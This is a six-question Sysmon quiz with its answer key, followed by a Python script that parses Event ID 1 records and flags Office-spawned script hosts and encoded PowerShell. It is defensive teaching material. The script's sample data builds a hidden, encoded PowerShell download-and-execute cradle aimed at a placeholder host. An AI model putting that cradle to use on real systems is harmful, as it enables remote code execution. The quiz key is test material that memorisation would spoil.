[&] What is Sysmon primarily used for?
- To replace the standard Windows Event Logging
- To patch vulnerabilities across multiple Windows endpoints
- To enhance detection and analysis of system events -- Correct
- To manage user account permissions in Active Directory

[&] Which of the following has a significant impact on Sysmon's functionality and efficiency?
- The operating system version
- The size of the hard drive
- The number of user accounts on the system
- The XML configuration file used -- Correct

[&] How does Sysmon help incident responders during an investigation?
- By scanning endpoints for known vulnerabilities and patching them
- By automatically tagging malicious activity
- By providing detailed logs of process creations, network connections, and file changes -- Correct
- By automatically blocking malicious network connections in real-time

[&] Why is Sysmon considered lightweight?
- It only runs when manually activated
- It has a low resource footprint and customizable settings -- Correct
- It eliminates the need for external monitoring tools
- It requires zero configuration to deploy

[&] Which Sysmon event ID is used to track process creation?
- Event ID 11
- Event ID 3
- Event ID 1 -- Correct
- Event ID 13

[&] What advantage does Sysmon provide over standard Windows event logs?
- It offers enhanced visibility and detailed logging for security analysis -- Correct
- It provides a graphical interface for easier management
- It runs on non-Windows systems seamlessly
- It automatically fixes network issues
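The quiz points at the two things a responder actually does with Sysmon: read the Event ID 1 (process creation) records and turn the parent image, image and command line they carry into a detection. The script below is an added example written for this page, not Sysmon's own code or anything from the quiz. It parses Event ID 1 records in the XML shape the Windows Event Log renders (the namespace and the Data Name= fields are real Sysmon output), then flags an Office application spawning a script host and decodes a PowerShell -EncodedCommand payload. The two sample records, the CORP\alice user, the example.invalid URL and the parent/child rule itself are constructed for illustration.

```python
"""Added example: parse Sysmon Event ID 1 (process creation) records and run a
simple parent/child and encoded-command detection over them.
The sample records at the bottom are constructed, not real telemetry."""
import base64
import binascii
import xml.etree.ElementTree as ET

# Windows Event Log XML namespace, as emitted by Get-WinEvent's .ToXml().
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Assumed detection rule: Office parents that should almost never spawn a
# shell or script host (macro / phishing-style execution).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}


def parse_sysmon_event(xml_text):
    """Return {'EventID': int, <Data Name>: value, ...} for one rendered event,
    or None if the record did not come from the Sysmon provider."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    if system.find("e:Provider", NS).get("Name") != "Microsoft-Windows-Sysmon":
        return None
    event = {"EventID": int(system.find("e:EventID", NS).text)}
    for data in root.find("e:EventData", NS).findall("e:Data", NS):
        event[data.get("Name")] = data.text or ""
    return event


def _basename(path):
    """Lower-cased file name from a Windows path (Image / ParentImage)."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand
    (PowerShell expects base64 of UTF-16LE), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def detect_suspicious_process(event):
    """Return the reasons an Event ID 1 record fired; empty list means clean."""
    reasons = []
    if not event or event.get("EventID") != 1:
        return reasons
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(event.get("CommandLine", ""))
        if decoded is not None:
            reasons.append(f"encoded PowerShell: {decoded}")
    return reasons


def scan(xml_records):
    """Parse every record and return [(index, reasons)] for the ones that fired."""
    hits = []
    for i, xml_text in enumerate(xml_records):
        reasons = detect_suspicious_process(parse_sysmon_event(xml_text))
        if reasons:
            hits.append((i, reasons))
    return hits


# ---- constructed sample records (shape of real Sysmon output, fake content) --
def _event1(image, cmdline, parent):
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">{image}</Data>
    <Data Name="CommandLine">{cmdline}</Data>
    <Data Name="ParentImage">{parent}</Data>
    <Data Name="User">CORP\\alice</Data>
  </EventData>
</Event>"""

# Hypothetical download cradle; example.invalid never resolves.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

SAMPLE_RECORDS = [
    _event1(r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt",
            r"C:\Windows\explorer.exe"),
    _event1(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
            f"powershell.exe -nop -w hidden -enc {ENCODED}",
            r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_RECORDS):
        print(f"record {idx}: " + "; ".join(reasons))
```

Only the second record fires, on both rules. The same parse_sysmon_event works on real exports because it keys on the Data Name= attributes rather than field order; note that which Event ID 1 records exist at all is governed by the Sysmon XML configuration (the quiz's point about the config file), so a rule like this is only as good as the include/exclude filters that let those events through.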